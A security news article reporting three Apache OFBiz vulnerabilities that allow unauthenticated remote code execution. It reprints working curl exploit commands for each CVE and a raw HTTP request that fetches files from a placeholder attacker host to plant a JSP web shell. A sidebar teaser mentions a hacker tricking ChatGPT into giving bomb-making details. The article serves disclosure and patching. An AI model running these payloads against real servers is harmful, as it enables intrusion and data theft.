Sunday, September 15, 2024
HomeCVE/vulnerabilityApache OFBiz for Linux & Windows Vulnerability Allows Unauthenticated Remote Code Execution

Apache OFBiz for Linux & Windows Vulnerability Allows Unauthenticated Remote Code Execution

Published on

A series of vulnerabilities affecting Apache OFBiz has come to light, raising significant cybersecurity concerns.

These vulnerabilities, identified as Common Vulnerabilities and Exposures (CVEs), enable unauthenticated remote code execution on both Linux and Windows platforms.

This article delves into the specifics of these vulnerabilities, their implications, and the steps taken to mitigate them.

- Advertisement - EHA

Apache OFBiz, a popular open-source enterprise resource planning (ERP) system, has been found to have multiple vulnerabilities that attackers could exploit to execute arbitrary code remotely, according to a report by SecList.

These vulnerabilities have been documented under several CVEs, the most notable being CVE-2024-32113, CVE-2024-36104, and CVE-2024-38856.

CVE-2024-32113: Path Traversal Vulnerability

The first in the series, CVE-2024-32113, was disclosed on May 8, 2024. This vulnerability is rooted in a path traversal issue (CWE-22), allowing attackers to manipulate the application’s controller view map state.

By sending unexpected URI patterns, attackers can bypass authentication checks and gain access to administrative functionalities, such as executing SQL queries or code.

Example Exploit Code:

curl 'https://target:8443/webtools/control/forgotPassword/../ProgramExport' \
-d "groovyProgram=throw+new+Exception('echo cmd output: `id`'.execute().text);" \
-vvv -k --path-as-is

Are You From SOC/DFIR Teams? - Try Advanced Malware and Phishing Analysis With ANY.RUN - 14 day free trial

CVE-2024-36104: Enhanced Path Traversal

Following CVE-2024-32113, CVE-2024-36104 was published on June 4, 2024. This vulnerability also involves path traversal but focuses on preventing the use of particular encoded character sequences.

The remediation involved normalizing URLs to strip semicolons and URL-encoded periods.

Example Exploit Code:

curl 'https://target:8443/webtools/control/forgotPassword/;/ProgramExport' \
-d "groovyProgram=throw+new+Exception('echo cmd output: `id`'.execute().text);" \
-vvv -k --path-as-is
curl 'https://target:8443/webtools/control/forgotPassword/%2e%2e/ProgramExport' \
-d "groovyProgram=throw+new+Exception('echo cmd output: `id`'.execute().text);" \
-vvv -k --path-as-is

CVE-2024-38856: Incorrect Authorization

The most recent vulnerability, CVE-2024-38856, was disclosed on August 5, 2024. It pertains to incorrect authorization checks that allow unauthenticated endpoints to execute screen rendering code.

This vulnerability underscores the need for explicit permission checks in screen definitions.

Example Exploit Code:

curl 'https://target:8443/webtools/control/forgotPassword/ProgramExport' \
-d "groovyProgram=throw+new+Exception('echo cmd output: `id`'.execute().text);" \
-vvv -k

The root cause of these vulnerabilities lies in the ability to desynchronize the controller and view the map state.

Despite patches being released, the underlying issue was not fully resolved, allowing attackers to continue exploiting these vulnerabilities.

Exploitation Method

Attackers can leverage these vulnerabilities to perform unauthorized file operations, such as writing password hashes and credit card numbers to accessible files.

Additionally, they can achieve remote code execution by exploiting the desynchronized state of the controller and view map.

Example Exploit Code for Remote Code Execution:

POST /webtools/control/forgotPassword/viewdatafile HTTP/2
Host: target:8443
User-Agent: curl/7.81.0
Accept: */*
Content-Length: 241
Content-Type: application/x-www-form-urlencoded
DATAFILE_LOCATION=http://attacker:80/rcereport.csv&DATAFILE_SAVE=./applications/accounting/webapp/accounting/index.jsp&DATAFILE_IS_URL=true&DEFINITION_LOCATION=http://attacker:80/rceschema.xml&DEFINITION_IS_URL=true&DEFINITION_NAME=rce

Remediation and Recommendations

The Apache OFBiz team has been proactive in addressing these vulnerabilities. The most recent patch, v18.12.16, introduces authorization checks for view maps, ensuring access is restricted based on user authentication status.

  1. Immediate Update: Users are strongly advised to update to the latest version of Apache OFBiz to mitigate these vulnerabilities.
  2. Regular Audits: Conduct security audits and review access controls within OFBiz installations.
  3. Network Monitoring: Implement network monitoring solutions to promptly detect and respond to suspicious activities.

The discovery of these vulnerabilities in Apache OFBiz highlights the critical importance of robust security practices in open-source software.

While patches have been released, ongoing vigilance and proactive measures are essential to safeguard systems against potential exploits.

Users must remain informed and take necessary actions to protect their installations from unauthorized access and data breaches.

What Does MITRE ATT&CK Expose About Your Enterprise Security? - Watch Free Webinar!

Divya
Divya
Divya is a Senior Journalist at GBhackers covering Cyber Attacks, Threats, Breaches, Vulnerabilities and other happenings in the cyber world.

Latest articles

Kali Linux 2024.3 Released With New Hacking Tools

Kali Linux 2024.3, the most recent iteration of Offensive Security's highly regarded Debian-based distribution...

Hacker Tricks ChatGPT to Get Details for Making Homemade Bombs

A hacker known as Amadon has reportedly managed to bypass the safety protocols of...

Citrix Workspace App Vulnerable to Privilege Escalation Attacks

Citrix released a security bulletin (CTX691485) detailing two critical vulnerabilities in the Citrix Workspace...

Beware Of Weaponized Excel Document That Delivers Fileless Remcos RAT

A recent advanced malware campaign leverages a phishing attack to deliver a seemingly benign...

Free Webinar

Decoding Compliance | What CISOs Need to Know

Non-compliance can result in substantial financial penalties, with average fines reaching up to $4.5 million for GDPR breaches alone.

Join us for an insightful panel discussion with Chandan Pani, CISO - LTIMindtree and Ashish Tandon, Founder & CEO – Indusface, as we explore the multifaceted role of compliance in securing modern enterprises.

Discussion points

The Role of Compliance
The Alphabet Soup of Compliance
Compliance
SaaS and Compliance
Indusface's Approach to Compliance

More like this

Kali Linux 2024.3 Released With New Hacking Tools

Kali Linux 2024.3, the most recent iteration of Offensive Security's highly regarded Debian-based distribution...

Hacker Tricks ChatGPT to Get Details for Making Homemade Bombs

A hacker known as Amadon has reportedly managed to bypass the safety protocols of...

Citrix Workspace App Vulnerable to Privilege Escalation Attacks

Citrix released a security bulletin (CTX691485) detailing two critical vulnerabilities in the Citrix Workspace...